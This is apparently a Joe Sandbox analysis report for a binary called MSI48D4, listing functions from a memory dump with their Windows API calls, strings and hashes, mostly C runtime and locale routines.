Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: MemoryProcessRead$AddressDirectoryErrorFreeLastLibraryProcSystem_wcschr
String ID: NtQueryInformationProcess
API String ID: 566592816-2781105232
Opcode ID: 57f8e89117d6a1ccb977958320f0c54fc689aeb2a3e783397c0b063b609aebc1
Instruction ID: 8b408b1dbda419ac2c8d7f82fbc1c7a99dea86de3ca247410bd2f9b08f4ce727
Opcode Fuzzy Hash: 57f8e89117d6a1ccb977958320f0c54fc689aeb2a3e783397c0b063b609aebc1
Instruction Fuzzy Hash: CEA15A70904749DEDB20DF64CC49BEEBBF0AF49318F204599D449A7280EBB5AAC4DF91

Function 00C140B0 Relevance: 12.2, APIs: 8, Instructions: 233memorytimeCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,40000022,0EAD22C0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00C14154
LocalAlloc.KERNEL32(00000040,3FFFFFFF,0EAD22C0,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00C14177
LocalFree.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C14217
OpenProcess.KERNEL32(00000400,00000000,?,0EAD22C0,?,?,?), ref: 00C142D2
OpenProcess.KERNEL32(00000400,00000000,?,?,0EAD22C0,?,?,?), ref: 00C142F3
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,0EAD22C0,?,?,?), ref: 00C14326
GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,0EAD22C0,?,?,?), ref: 00C14337
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C14355
CloseHandle.KERNEL32(00000000,?,0EAD22C0,?,?,?), ref: 00C14371

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Process$Local$AllocCloseHandleOpenTimes$Free
String ID:
API String ID: 1424318461-0
Opcode ID: d10fd699b002b2e31764cbe8909fd98644edfda19eb14b83a8cf8ced90305f69
Instruction ID: 53e16dc8eb7e3279093cb96ee8db92d3d4b059842510e38b2cc0cea611cc6111
Opcode Fuzzy Hash: d10fd699b002b2e31764cbe8909fd98644edfda19eb14b83a8cf8ced90305f69
Instruction Fuzzy Hash: 8A81B575A00205DFCB18CFA8D885BEEBBB4FB49710F244229E525E73D0D7706A819B90

Function 00C3266D Relevance: 12.2, APIs: 8, Instructions: 224COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00C326F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C32786
__alloca_probe_16.LIBCMT ref: 00C327B0
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C327F8
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00C32812
__alloca_probe_16.LIBCMT ref: 00C32838
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C32875
CompareStringEx.KERNEL32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00C32892

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$CompareInfoString
String ID:
API String ID: 3603178046-0
Opcode ID: 6835fd86124ce353cc666f2774cfddd6ba0631c7afabd4910dfc4fa1e99cb5a7
Instruction ID: 1d47af24acd41bc4725f5740b1464fa1db1181cb4f6cabe6c2c3698a0464245e
Opcode Fuzzy Hash: 6835fd86124ce353cc666f2774cfddd6ba0631c7afabd4910dfc4fa1e99cb5a7
Instruction Fuzzy Hash: B271D53692020AAFDF219FA5DC41AEF7BB6FF46750F280119F914A7190D735CA40DBA1

Function 00C3215A Relevance: 12.2, APIs: 8, Instructions: 175COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 00C321A3
__alloca_probe_16.LIBCMT ref: 00C321CF
MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00C3220E
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C3222B
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00C3226A
__alloca_probe_16.LIBCMT ref: 00C32287
LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C322C9
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00C322EC

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ByteCharMultiStringWide$__alloca_probe_16
String ID:
API String ID: 2040435927-0
Opcode ID: b9cb1702a54185a943797d2c188f36446185b4947e52c26220116af8c3fd3ffe
Instruction ID: 10f7a9c56010342e76a93a54b47e45779d4653fac2038140b84f05087cb934c0
Opcode Fuzzy Hash: b9cb1702a54185a943797d2c188f36446185b4947e52c26220116af8c3fd3ffe
Instruction Fuzzy Hash: 9151F03292020ABFDF208F65DC45FAF7BA9EF44B50F114128FA25A61A0D735CE109BA0

Function 00C18610 Relevance: 10.7, APIs: 7, Instructions: 157memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C18657
std::_Lockit::_Lockit.LIBCPMT ref: 00C18679
std::_Lockit::~_Lockit.LIBCPMT ref: 00C186A1
LocalAlloc.KERNEL32(00000040,00000044,00000000,0EAD22C0,?,00000000), ref: 00C186F9
__Getctype.LIBCPMT ref: 00C1877B
std::_Facet_Register.LIBCPMT ref: 00C187E4
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1880E

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: 900f9f7950f64872a8335da0cf848ae66a503a6d1db0d652d32a33a23b2b986c
Instruction ID: 3f5e462870fd0f68bdd3d68b5cac60a529a5ab6fa659231c089b229152919612
Opcode Fuzzy Hash: 900f9f7950f64872a8335da0cf848ae66a503a6d1db0d652d32a33a23b2b986c
Instruction Fuzzy Hash: 8B6104B0D04204CFDB21CF68D940BAEB7F0FF15314F244259E845AB392EB70AA85DB91

Function 00C19270 Relevance: 10.6, APIs: 7, Instructions: 135memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C192A0
std::_Lockit::_Lockit.LIBCPMT ref: 00C192C2
std::_Lockit::~_Lockit.LIBCPMT ref: 00C192EA
LocalAlloc.KERNEL32(00000040,00000018,00000000,0EAD22C0,?,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00C19342
__Getctype.LIBCPMT ref: 00C193BD
std::_Facet_Register.LIBCPMT ref: 00C193F8
std::_Lockit::~_Lockit.LIBCPMT ref: 00C19422

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
String ID:
API String ID: 2372200979-0
Opcode ID: 9744371c57308fe08bdc4fbfd13b713b4a8e0eeca2155b7b7b94f7bbc03caae5
Instruction ID: 89c73eeff40288c1e9d2c15cc47eecd50f6f2b1eff7d8e775e3c8aa6cef13ebc
Opcode Fuzzy Hash: 9744371c57308fe08bdc4fbfd13b713b4a8e0eeca2155b7b7b94f7bbc03caae5
Instruction Fuzzy Hash: E051FFB0D04218DFCB21CF68D4507DEBBF0EF15710F208259E856AB392D7B0AA81EB81

Function 00C33F20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00C33F57
___except_validate_context_record.LIBVCRUNTIME ref: 00C33F5F
_ValidateLocalCookies.LIBCMT ref: 00C33FE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00C34013
_ValidateLocalCookies.LIBCMT ref: 00C34068

Strings

csm, xrefs: 00C33FFD

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 49a88766392811e9785765db2194841bd9c83778b748ad38f2be1ad4a213da62
Instruction ID: 825fc8f3207e1de52d18bb929630b8b5c6e42894917dfda11bc503b871d6ab9f
Opcode Fuzzy Hash: 49a88766392811e9785765db2194841bd9c83778b748ad38f2be1ad4a213da62
Instruction Fuzzy Hash: AA41B634E10249ABCF14DFA8C881A9EBBB5FF48324F148195F9146B392C735AF45CB90

Function 00C472FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00C47408,00C43841,0000000C,?,00000000,00000000,?,00C47632,00000021,FlsSetValue,00C5BD58,00C5BD60,?), ref: 00C473BC

Strings

api-ms-, xrefs: 00C47352
ext-ms-, xrefs: 00C47366

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b4d6714a87f9057b859d02feb469e84123576110e73f5efe9f0a0198edcec00f
Instruction ID: 55520002dddbdacaaa2ab84f4dc2449b0c38ead325b3f99d68525bb22b5ae3c8
Opcode Fuzzy Hash: b4d6714a87f9057b859d02feb469e84123576110e73f5efe9f0a0198edcec00f
Instruction Fuzzy Hash: 59210835A09211EBCB319F65AC41B6E3798AF41760F150310ED15A72A0D770EE40D6D0

Function 00C28969 Relevance: 9.4, APIs: 6, Instructions: 449COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C28970
ctype.LIBCPMT ref: 00C289B7

Part of subcall function 00C2851C: __Getctype.LIBCPMT ref: 00C2852B

Part of subcall function 00C2270D: __EH_prolog3.LIBCMT ref: 00C22714
Part of subcall function 00C2270D: std::_Lockit::_Lockit.LIBCPMT ref: 00C2271E
Part of subcall function 00C2270D: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2278F

Part of subcall function 00C1F3D9: __EH_prolog3.LIBCMT ref: 00C1F3E0
Part of subcall function 00C1F3D9: std::_Lockit::_Lockit.LIBCPMT ref: 00C1F3EA
Part of subcall function 00C1F3D9: std::_Lockit::~_Lockit.LIBCPMT ref: 00C1F48E

Part of subcall function 00C22837: __EH_prolog3.LIBCMT ref: 00C2283E
Part of subcall function 00C22837: std::_Lockit::_Lockit.LIBCPMT ref: 00C22848
Part of subcall function 00C22837: std::_Lockit::~_Lockit.LIBCPMT ref: 00C228B9

Part of subcall function 00C1F3D9: Concurrency::cancel_current_task.LIBCPMT ref: 00C1F499

Part of subcall function 00C229F6: __EH_prolog3.LIBCMT ref: 00C229FD
Part of subcall function 00C229F6: std::_Lockit::_Lockit.LIBCPMT ref: 00C22A07
Part of subcall function 00C229F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00C22A78

Part of subcall function 00C22961: __EH_prolog3.LIBCMT ref: 00C22968
Part of subcall function 00C22961: std::_Lockit::_Lockit.LIBCPMT ref: 00C22972
Part of subcall function 00C22961: std::_Lockit::~_Lockit.LIBCPMT ref: 00C229E3

collate.LIBCPMT ref: 00C28B05
numpunct.LIBCPMT ref: 00C28DAF
__Getcoll.LIBCPMT ref: 00C28B47

Part of subcall function 00C18C20: std::_Lockit::_Lockit.LIBCPMT ref: 00C18C50
Part of subcall function 00C18C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00C18C78

Part of subcall function 00C16330: LocalAlloc.KERNEL32(00000040,?,00C20E04,00000020,?,?,00C19942,00000000,0EAD22C0,?,?,?,?,00C550DD,000000FF), ref: 00C16336

codecvt.LIBCPMT ref: 00C28E6D

Part of subcall function 00C22E09: __EH_prolog3.LIBCMT ref: 00C22E10
Part of subcall function 00C22E09: std::_Lockit::_Lockit.LIBCPMT ref: 00C22E1A
Part of subcall function 00C22E09: std::_Lockit::~_Lockit.LIBCPMT ref: 00C22E8B

Part of subcall function 00C22F33: __EH_prolog3.LIBCMT ref: 00C22F3A
Part of subcall function 00C22F33: std::_Lockit::_Lockit.LIBCPMT ref: 00C22F44
Part of subcall function 00C22F33: std::_Lockit::~_Lockit.LIBCPMT ref: 00C22FB5

Part of subcall function 00C222FA: __EH_prolog3.LIBCMT ref: 00C22301
Part of subcall function 00C222FA: std::_Lockit::_Lockit.LIBCPMT ref: 00C2230B
Part of subcall function 00C222FA: std::_Lockit::~_Lockit.LIBCPMT ref: 00C2237C

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: Lockitstd::_$H_prolog3Lockit::_Lockit::~_$AllocConcurrency::cancel_current_taskGetcollGetctypeLocalcodecvtcollatectypenumpunct
String ID:
API String ID: 3494022857-0
Opcode ID: 67529603633d786c33f5b5a9ba4435655a2485dc6891cf0c24d7d97457f9ba70
Instruction ID: 46741f82e33937d17bb0d12b7a44669b045eb660c781989f7379f925f3120c83
Opcode Fuzzy Hash: 67529603633d786c33f5b5a9ba4435655a2485dc6891cf0c24d7d97457f9ba70
Instruction Fuzzy Hash: 0BE1B7B0D02225ABEB106F709C42ABF7AA6DF02760F44442DF81A67691DF754D48B7F2

Function 00C1B500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C1B531
std::_Lockit::_Lockit.LIBCPMT ref: 00C1B54F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B577
LocalAlloc.KERNEL32(00000040,0000000C,00000000,0EAD22C0,?,00000000,00000000), ref: 00C1B5CF
std::_Facet_Register.LIBCPMT ref: 00C1B6B7
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B6E1

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: f39c82a59bf029712b82ac9f04ee36e0ddfa28ae149ec0c4a63b3787b0d8c406
Instruction ID: 77336601b5da6896198915c26506f0dfcdded7a23e50a32de6cc2dee7b608807
Opcode Fuzzy Hash: f39c82a59bf029712b82ac9f04ee36e0ddfa28ae149ec0c4a63b3787b0d8c406
Instruction Fuzzy Hash: 7451DFB4900218DFDB11CF59D8807EEBBB4FF11314F24415AE815AB391E7B59E85EB81

Function 00C1B700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C1B731
std::_Lockit::_Lockit.LIBCPMT ref: 00C1B74F
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B777
LocalAlloc.KERNEL32(00000040,00000008,00000000,0EAD22C0,?,00000000,00000000), ref: 00C1B7CF
std::_Facet_Register.LIBCPMT ref: 00C1B863
std::_Lockit::~_Lockit.LIBCPMT ref: 00C1B88D

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
String ID:
API String ID: 3931714976-0
Opcode ID: 48ebf71f802e670db7bd86e448669eb2d970c7161db6b0e41b85c8f17374ba83
Instruction ID: 3dea82d8f081b3c9baf5b5ce7e4e1c4426b52db40ab78e24fa9429346b533b42
Opcode Fuzzy Hash: 48ebf71f802e670db7bd86e448669eb2d970c7161db6b0e41b85c8f17374ba83
Instruction Fuzzy Hash: F151D0B4900218DFDB21CF59C98079EBBB4EF15710F20815EE851AB391D7B0AE80EF90

Function 00C40351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00C4043B
__freea.LIBCMT ref: 00C404D1
__freea.LIBCMT ref: 00C404ED

Strings

am/pm, xrefs: 00C40551
a/p, xrefs: 00C405B5

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: __freea$__alloca_probe_16
String ID: a/p$am/pm
API String ID: 3509577899-3206640213
Opcode ID: 2f0bc69afcfb9af4f22f4b285665c588f8fbdb6a989c3737a5e7e6c7528f1acd
Instruction ID: 1f8e0c17ed5f139e73d9d3fbdce3c1ca3c5cc7c0fcdd38fa09c0bb989c80789a
Opcode Fuzzy Hash: 2f0bc69afcfb9af4f22f4b285665c588f8fbdb6a989c3737a5e7e6c7528f1acd
Instruction Fuzzy Hash: 2BC10E35980206DBCB24CF69C989BBAB7B0FF45310F344049EB16AB251D335AE41DFA6

Function 00C35978 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00C3596F,00C34900,00C3358F), ref: 00C35986
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00C35994
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C359AD
SetLastError.KERNEL32(00000000,00C3596F,00C34900,00C3358F), ref: 00C359FF

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 417c2bf02855e28dcaa0adc6e2243f1e21628cd707e8277124a29ad2b658fe2e
Instruction ID: 2cbd6050f580865d2299f55f4ebc729f359ac4620529ee7f3466f8b0bb5b2f7a
Opcode Fuzzy Hash: 417c2bf02855e28dcaa0adc6e2243f1e21628cd707e8277124a29ad2b658fe2e
Instruction Fuzzy Hash: 7701843322DB12EFA6342675BDC6B6E6754EB0177EF204329F524951E1EF524C42A580

Function 00C13230 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 260fileCOMMON

Download Yara Rule

APIs

GetTempFileNameW.KERNEL32(?,URL,00000000,?,0EAD22C0,?,00000004), ref: 00C13294
MoveFileW.KERNEL32(?,00000000), ref: 00C1354A
DeleteFileW.KERNEL32(?), ref: 00C13592

Part of subcall function 00C11A70: LocalAlloc.KERNEL32(00000040,80000022), ref: 00C11AF7
Part of subcall function 00C11A70: LocalFree.KERNEL32(7FFFFFFE), ref: 00C11B7D

Part of subcall function 00C12E60: LocalFree.KERNEL32(?,0EAD22C0,?,?,00C53C40,000000FF,?,00C11242,0EAD22C0,?,?,00C53C75,000000FF), ref: 00C12EB1

Strings

URL, xrefs: 00C1328E, 00C1357A
url, xrefs: 00C133B9, 00C13575

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: FileLocal$Free$AllocDeleteMoveNameTemp
String ID: URL$url
API String ID: 853893950-346267919
Opcode ID: 5b1be1829c6df406528855d4a909351873474ba0ea4602e9331accf96d1a2895
Instruction ID: 8b205e0173c07a9073226690e53e21e377582663be149f37bb228fad65163d84
Opcode Fuzzy Hash: 5b1be1829c6df406528855d4a909351873474ba0ea4602e9331accf96d1a2895
Instruction Fuzzy Hash: 5AC16770914268DADB24DF24CC98BDDBBB4BF15308F1042D9D409A7291EBB96BC8DF91

Function 00C136D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C13735
GetLastError.KERNEL32(?,?,?,00C54215,000000FF), ref: 00C1381A

Part of subcall function 00C12310: GetProcessHeap.KERNEL32 ref: 00C12365

Part of subcall function 00C146F0: FindResourceExW.KERNEL32(00000000,00000006,?,00000000,00000000,?,?,?,?,00C13778,-00000010,?,?,?,00C54215,000000FF), ref: 00C14736

_wcschr.LIBVCRUNTIME ref: 00C137C6
LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00C54215,000000FF), ref: 00C137DB

Strings

ntdll.dll, xrefs: 00C137B3

Memory Dump Source

Source File: 00000003.00000002.1679607568.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000003.00000002.1679589343.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679670908.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1679687909.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c10000_MSI48D4.jbxd

Similarity

API ID: DirectoryErrorFindHeapLastLibraryLoadProcessResourceSystem_wcschr
String ID: ntdll.dll
API String ID: 3941625479-2227199552
Opcode ID: c7895d5fcd4056d25354d1f6cfbd4f5985a53a1c22e9007d98bb37bbd3573d0c
Instruction ID: a699b0cc3866fc379fb197f420c3d9aacda232618487d91a99773a1f21a04aa5
Opcode Fuzzy Hash: c7895d5fcd4056d25354d1f6cfbd4f5985a53a1c22e9007d98bb37bbd3573d0c
Instruction Fuzzy Hash: 7A41B1B06006459FDB14DFA8CC85BEEB7E4FF05314F144629E926972C1EBB49B44DB90

Function 00C1621F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C11A20: LocalFree.KERNEL32(?), ref: 00C11A42

Part of subcall function 00C33E5A: RaiseException.KERNEL32(E06D7363,00000001,00000003,00C11434,?,?,00C1D341,00C11434,00C68B5C,?,00C11434,?,00000000), ref: 00C33EBA

